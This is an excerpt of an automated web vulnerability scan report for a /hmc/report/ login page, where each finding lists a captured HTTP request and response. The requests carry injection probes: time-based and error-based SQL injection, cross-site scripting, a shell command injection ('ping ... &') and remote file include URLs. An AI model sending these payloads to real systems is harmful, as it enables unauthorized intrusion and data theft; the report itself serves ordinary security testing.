       <form name="form1" action="/hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.55. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=print(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=print(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.56. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%3Cscript%3Ens(0x000031)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:48 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%3cscript%3ens(0x000031)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.57. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.58. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1+AND+'NS%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1+AND+'NS%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.59. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003F))%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x00003F))%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.60. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.61. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.62. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.63. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%3E%3Cnet%20sparker=netsparker(0x00002C)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x00002C)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.64. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%22%20ns=%20netsparker(0x000015)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%22%20ns=%20netsparker(0x000015)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.65. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.66. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.67. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1%20ns=netsparker(0x00001A)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%20ns=netsparker(0x00001A)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.68. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=//netsparker.com/n/n.css?0x000020 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x000020" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.69. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.70. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.71. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.72. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%27%22%20ns=%20netsparker(0x000012)%20 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
